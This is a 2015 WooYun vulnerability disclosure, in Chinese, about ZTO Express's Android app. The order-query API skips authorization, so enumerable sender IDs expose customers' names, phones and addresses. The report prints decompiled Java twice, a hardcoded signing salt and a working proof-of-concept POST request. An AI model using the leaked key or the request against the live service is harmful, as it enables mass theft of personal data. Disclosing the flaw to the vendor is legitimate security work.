当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109482

漏洞标题:中通快递某处遍历获取大量订单信息

相关厂商:中通速递

漏洞作者: firexp

提交时间:2015-04-21 19:21

修复时间:2015-06-05 21:26

公开时间:2015-06-05 21:26

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-21: 细节已通知厂商并且等待厂商处理中
2015-04-21: 厂商已经确认,细节仅向厂商公开
2015-05-01: 细节向核心白帽子及相关领域专家公开
2015-05-11: 细节向普通白帽子公开
2015-05-21: 细节向实习白帽子公开
2015-06-05: 细节向公众公开

简要描述:

可获取收件人电话,地址

详细说明:

漏洞发生在中通快递Android App上,用jeb反编译一下.
在com.geenk.activity.MyZTO_MyOrder这里

public void onClick(View v) {
                if(new NetworkUtil().checkNetworkState(MyZTO_MyOrder.this.getParent()) == 2) {
                    MyZTO_MyOrder.this.dialogUtil.showWaitDialog("请稍等...");
                    JSONObject v2 = new JSONObject();
                    try {
                        //sendId可遍历,七位数字
                        v2.put("sendId", ZTOApplication.ACCOUNT_ONLY_ID);
                        v2.put("starttime", "2014-04-28 10:10:10");
                        v2.put("endtime", new SimpleDateFormat("yyyy-MM-dd HH:MM:ss").format(new Date()));
                        v2.put("pageSize", 10);
                        v2.put("pageIndex", 1);
                        new Thread() {
                            public void run() {
                                String v25;
                                JSONObject v17;
                                Object v11;
                                JSONArray v10;
                                String v5;
                                String v4;
                                try {
                                    v4 = String.valueOf(this.val$param_zto.toString()) + "WkhPTkdUT05HS1VBSURJQVBQ";
                                    new MD5();
                                    v5 = MD5.encodeByMD5(v4);
                                    HashMap v21 = new HashMap();
                                    v21.put("data", this.val$param_zto.toString());
                                    v21.put("data_digest", v5);
                                    v21.put("msg_type", "SEARCH");
                                    v21.put("company_id", "APP");
                                    //向http://japi.zto.cn/zto/api_utf8/commonOrder Post数据未验证用户权限,可获取orderCode
                                    this.this$1.this$0.result = HttpGetPost.httpPost(ZTOApplication.
                                            URL_BILL_QUERY, v21);
                                    System.out.println("订单申请:" + this.this$1.this$0.result);
                                }
                                catch(Exception v8) {
                                    v8.printStackTrace();
                                }
                                if(!this.this$1.this$0.result.contains("true")) {
                                    goto label_395;
                                }
                                JSONArray v16 = new JSONArray();
                                try {
                                    JSONArray v15 = new JSONObject(this.this$1.this$0.result).getJSONObject(
                                            "data").getJSONArray("order_list");
                                    if(v15.length() <= 0) {
                                        goto label_387;
                                    }
                                    int v9;
                                    for(v9 = 0; v9 < v15.length(); ++v9) {
                                        v16.put(v15.get(v9).getString("orderCode"));
                                    }
                                    JSONObject v26 = new JSONObject();
                                    v26.put("orderCode", v16);
                                    v26.put("sendId", ZTOApplication.ACCOUNT_ONLY_ID);
                                    v4 = String.valueOf(v26.toString()) + "WkhPTkdUT05HS1VBSURJQVBQ";
                                    //密钥泄漏
                                    new MD5();
                                    v5 = MD5.encodeByMD5(v4);
                                    HashMap v22 = new HashMap();
                                    v22.put("data", v26.toString());
                                    v22.put("data_digest", v5);
                                    v22.put("msg_type", "SEARCHBYCODE");
                                    v22.put("company_id", "APP");
                                    try {
                                        this.this$1.this$0.detail_result = HttpGetPost.httpPost(ZTOApplication
                                                .URL_BILL_QUERY, v22);
                                        System.out.println("订单详情数据:" + this.this$1.this$0.detail_result);
                                        goto label_148;
                                    }
                                    catch(IOException v8_1) {
                                        try {
                                            v8_1.printStackTrace();
                                        label_148:
                                            v10 = new JSONObject(this.this$1.this$0.detail_result).getJSONObject(
                                                    "data").getJSONArray("order_list");
                                            if(v10.length() > 0) {
                                                SQLite.getInstance().delete(this.this$1.this$0.getApplicationContext(), 
                                                        "order_zto", "1", "1");
                                                SQLite.getInstance().closeConn();
                                            }
                                            v9 = 0;
                                        label_176:
                                            while(v9 >= v10.length()) {
                                                goto label_179;
                                            }
                                        }
                                        catch(JSONException v7) {
                                            goto label_203;
                                        }
                                    }
                                    catch(ClientProtocolException v8_2) {
                                        try {
                                            v8_2.printStackTrace();
                                            goto label_148;
                                        }
                                        catch(JSONException v7) {
                                            goto label_203;
                                        }
                                    }
                                }
                                catch(JSONException v7) {
                                    goto label_203;
                                }
                                try {
                                    v11 = v10.get(v9);
                                    v17 = ((JSONObject)v11).getJSONObject("sender");
                                    v25 = ((JSONObject)v11).getString("orderCode");
                                    goto label_220;
                                }
                                catch(JSONException v7) {
                                    try {
                                        v7.printStackTrace();
                                    label_220:
                                        ContentValues v6 = new ContentValues();
                                        v6.put("order_num", v25);
                                        v6.put("address_label", v17.getString("name"));
                                        v6.put("personal_sent", v17.getString("name"));
                                        v6.put("phone_num", v17.getString("mobile"));
                                        v6.put("area", "");
                                        v6.put("address_detail", v17.getString("address"));
                                        v6.put("zip_code", "");
                                        v6.put("sex", "");
                                        v6.put("name_company", "");
                                        v6.put("telephone_number", v17.getString("mobile"));
                                        v6.put("fax", "");
                                        v6.put("website", "");
                                        v6.put("email", "");
                                        v6.put("QQ", "");
                                        v6.put("wangwang", "");
                                        v6.put("province_id", "");
                                        v6.put("province", v17.getString("prov"));
                                        v6.put("city_id", "");
                                        v6.put("city", v17.getString("city"));
                                        v6.put("district_id", "");
                                        v6.put("district", v17.getString("county"));
                                        v6.put("time", ((JSONObject)v11).getString("create_date"));
                                        try {
                                            System.out.println("插入订单个数" + SQLite.getInstance().insert(
                                                    this.this$1.this$0.getApplicationContext(), "order_zto", 
                                                    null, v6));
                                            SQLite.getInstance().closeConn();
                                        }
                                        catch(Exception v7_1) {
                                            try {
                                                v7_1.printStackTrace();
                                            }
                                            catch(JSONException v7) {
                                                goto label_203;
                                            }
                                        }
                                    }
                                    catch(JSONException v7) {
                                        goto label_203;
                                    }
                                }
                                ++v9;
                                goto label_176;
                                try {
                                label_179:
                                    this.this$1.this$0.handler.sendEmptyMessage(10);
                                    return;
                                label_387:
                                    this.this$1.this$0.handler.sendEmptyMessage(30);
                                }
                                catch(JSONException v7) {
                                label_203:
                                    v7.printStackTrace();
                                }
                                return;
                            label_395:
                                this.this$1.this$0.handler.sendEmptyMessage(20);
                            }
                        }.start();
                    }
                    catch(Exception v0) {
                        v0.printStackTrace();
                    }
                }
            }
        });
        this.tittle = this.findViewById(2131099684);
        this.tittle.setText("我的订单");
        this.lv_order = this.findViewById(2131099686);
        MyZTO_MyOrder.list = new ArrayList();
        MyZTO_MyOrder.adapter = new OrderManagerAdapter(((Context)this), MyZTO_MyOrder.list);
        this.lv_order.setOnItemClickListener(new AdapterView$OnItemClickListener() {
            public void onItemClick(AdapterView arg6, View arg1, int arg2, long arg3) {
                Intent v0 = new Intent(MyZTO_MyOrder.this, MyZTO_Order_Detail.class);
                v0.putExtra("index", arg2);
                MyZTOActivity.group.replaceView(MyZTOActivity.group.getLocalActivityManager().startActivity(
                        "UpdatePassword", v0.addFlags(67108864)).getDecorView());
            }
        });
        this.lv_order.setAdapter(MyZTO_MyOrder.adapter);
        new Thread() {
            public void run() {
                List v0 = MyZTO_MyOrder.this.getData();
                Message v1 = new Message();
                v1.what = 1;
                v1.obj = v0;
                MyZTO_MyOrder.this.handler.sendMessage(v1);
            }
        }.start();
    }


看截图

QQ图片20150421191227.jpg


poc:
POST http://japi.zto.cn/zto/api_utf8/commonOrder
data={"sendId":"1332829","orderCode":["ZT15042134425441"]}&data_digest=cd3e3b9a037a115faed3426295e70898&msg_type=SEARCHBYCODE&company_id=APP

漏洞证明:

漏洞发生在中通快递Android App上,用jeb反编译一下.
在com.geenk.activity.MyZTO_MyOrder这里

public void onClick(View v) {
                if(new NetworkUtil().checkNetworkState(MyZTO_MyOrder.this.getParent()) == 2) {
                    MyZTO_MyOrder.this.dialogUtil.showWaitDialog("请稍等...");
                    JSONObject v2 = new JSONObject();
                    try {
                        //sendId可遍历,七位数字
                        v2.put("sendId", ZTOApplication.ACCOUNT_ONLY_ID);
                        v2.put("starttime", "2014-04-28 10:10:10");
                        v2.put("endtime", new SimpleDateFormat("yyyy-MM-dd HH:MM:ss").format(new Date()));
                        v2.put("pageSize", 10);
                        v2.put("pageIndex", 1);
                        new Thread() {
                            public void run() {
                                String v25;
                                JSONObject v17;
                                Object v11;
                                JSONArray v10;
                                String v5;
                                String v4;
                                try {
                                    v4 = String.valueOf(this.val$param_zto.toString()) + "WkhPTkdUT05HS1VBSURJQVBQ";
                                    new MD5();
                                    v5 = MD5.encodeByMD5(v4);
                                    HashMap v21 = new HashMap();
                                    v21.put("data", this.val$param_zto.toString());
                                    v21.put("data_digest", v5);
                                    v21.put("msg_type", "SEARCH");
                                    v21.put("company_id", "APP");
                                    //向http://japi.zto.cn/zto/api_utf8/commonOrder Post数据未验证用户权限,可获取orderCode
                                    this.this$1.this$0.result = HttpGetPost.httpPost(ZTOApplication.
                                            URL_BILL_QUERY, v21);
                                    System.out.println("订单申请:" + this.this$1.this$0.result);
                                }
                                catch(Exception v8) {
                                    v8.printStackTrace();
                                }
                                if(!this.this$1.this$0.result.contains("true")) {
                                    goto label_395;
                                }
                                JSONArray v16 = new JSONArray();
                                try {
                                    JSONArray v15 = new JSONObject(this.this$1.this$0.result).getJSONObject(
                                            "data").getJSONArray("order_list");
                                    if(v15.length() <= 0) {
                                        goto label_387;
                                    }
                                    int v9;
                                    for(v9 = 0; v9 < v15.length(); ++v9) {
                                        v16.put(v15.get(v9).getString("orderCode"));
                                    }
                                    JSONObject v26 = new JSONObject();
                                    v26.put("orderCode", v16);
                                    v26.put("sendId", ZTOApplication.ACCOUNT_ONLY_ID);
                                    v4 = String.valueOf(v26.toString()) + "WkhPTkdUT05HS1VBSURJQVBQ";
                                    //密钥泄漏
                                    new MD5();
                                    v5 = MD5.encodeByMD5(v4);
                                    HashMap v22 = new HashMap();
                                    v22.put("data", v26.toString());
                                    v22.put("data_digest", v5);
                                    v22.put("msg_type", "SEARCHBYCODE");
                                    v22.put("company_id", "APP");
                                    try {
                                        this.this$1.this$0.detail_result = HttpGetPost.httpPost(ZTOApplication
                                                .URL_BILL_QUERY, v22);
                                        System.out.println("订单详情数据:" + this.this$1.this$0.detail_result);
                                        goto label_148;
                                    }
                                    catch(IOException v8_1) {
                                        try {
                                            v8_1.printStackTrace();
                                        label_148:
                                            v10 = new JSONObject(this.this$1.this$0.detail_result).getJSONObject(
                                                    "data").getJSONArray("order_list");
                                            if(v10.length() > 0) {
                                                SQLite.getInstance().delete(this.this$1.this$0.getApplicationContext(), 
                                                        "order_zto", "1", "1");
                                                SQLite.getInstance().closeConn();
                                            }
                                            v9 = 0;
                                        label_176:
                                            while(v9 >= v10.length()) {
                                                goto label_179;
                                            }
                                        }
                                        catch(JSONException v7) {
                                            goto label_203;
                                        }
                                    }
                                    catch(ClientProtocolException v8_2) {
                                        try {
                                            v8_2.printStackTrace();
                                            goto label_148;
                                        }
                                        catch(JSONException v7) {
                                            goto label_203;
                                        }
                                    }
                                }
                                catch(JSONException v7) {
                                    goto label_203;
                                }
                                try {
                                    v11 = v10.get(v9);
                                    v17 = ((JSONObject)v11).getJSONObject("sender");
                                    v25 = ((JSONObject)v11).getString("orderCode");
                                    goto label_220;
                                }
                                catch(JSONException v7) {
                                    try {
                                        v7.printStackTrace();
                                    label_220:
                                        ContentValues v6 = new ContentValues();
                                        v6.put("order_num", v25);
                                        v6.put("address_label", v17.getString("name"));
                                        v6.put("personal_sent", v17.getString("name"));
                                        v6.put("phone_num", v17.getString("mobile"));
                                        v6.put("area", "");
                                        v6.put("address_detail", v17.getString("address"));
                                        v6.put("zip_code", "");
                                        v6.put("sex", "");
                                        v6.put("name_company", "");
                                        v6.put("telephone_number", v17.getString("mobile"));
                                        v6.put("fax", "");
                                        v6.put("website", "");
                                        v6.put("email", "");
                                        v6.put("QQ", "");
                                        v6.put("wangwang", "");
                                        v6.put("province_id", "");
                                        v6.put("province", v17.getString("prov"));
                                        v6.put("city_id", "");
                                        v6.put("city", v17.getString("city"));
                                        v6.put("district_id", "");
                                        v6.put("district", v17.getString("county"));
                                        v6.put("time", ((JSONObject)v11).getString("create_date"));
                                        try {
                                            System.out.println("插入订单个数" + SQLite.getInstance().insert(
                                                    this.this$1.this$0.getApplicationContext(), "order_zto", 
                                                    null, v6));
                                            SQLite.getInstance().closeConn();
                                        }
                                        catch(Exception v7_1) {
                                            try {
                                                v7_1.printStackTrace();
                                            }
                                            catch(JSONException v7) {
                                                goto label_203;
                                            }
                                        }
                                    }
                                    catch(JSONException v7) {
                                        goto label_203;
                                    }
                                }
                                ++v9;
                                goto label_176;
                                try {
                                label_179:
                                    this.this$1.this$0.handler.sendEmptyMessage(10);
                                    return;
                                label_387:
                                    this.this$1.this$0.handler.sendEmptyMessage(30);
                                }
                                catch(JSONException v7) {
                                label_203:
                                    v7.printStackTrace();
                                }
                                return;
                            label_395:
                                this.this$1.this$0.handler.sendEmptyMessage(20);
                            }
                        }.start();
                    }
                    catch(Exception v0) {
                        v0.printStackTrace();
                    }
                }
            }
        });
        this.tittle = this.findViewById(2131099684);
        this.tittle.setText("我的订单");
        this.lv_order = this.findViewById(2131099686);
        MyZTO_MyOrder.list = new ArrayList();
        MyZTO_MyOrder.adapter = new OrderManagerAdapter(((Context)this), MyZTO_MyOrder.list);
        this.lv_order.setOnItemClickListener(new AdapterView$OnItemClickListener() {
            public void onItemClick(AdapterView arg6, View arg1, int arg2, long arg3) {
                Intent v0 = new Intent(MyZTO_MyOrder.this, MyZTO_Order_Detail.class);
                v0.putExtra("index", arg2);
                MyZTOActivity.group.replaceView(MyZTOActivity.group.getLocalActivityManager().startActivity(
                        "UpdatePassword", v0.addFlags(67108864)).getDecorView());
            }
        });
        this.lv_order.setAdapter(MyZTO_MyOrder.adapter);
        new Thread() {
            public void run() {
                List v0 = MyZTO_MyOrder.this.getData();
                Message v1 = new Message();
                v1.what = 1;
                v1.obj = v0;
                MyZTO_MyOrder.this.handler.sendMessage(v1);
            }
        }.start();
    }


看截图

QQ图片20150421191227.jpg


poc:
POST http://japi.zto.cn/zto/api_utf8/commonOrder
data={"sendId":"1332829","orderCode":["ZT15042134425441"]}&data_digest=cd3e3b9a037a115faed3426295e70898&msg_type=SEARCHBYCODE&company_id=APP

修复方案:

版权声明:转载请注明来源 firexp@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-04-21 21:25

厂商回复:

感谢白帽子的提醒,我们会尽快修复。

最新状态:

暂无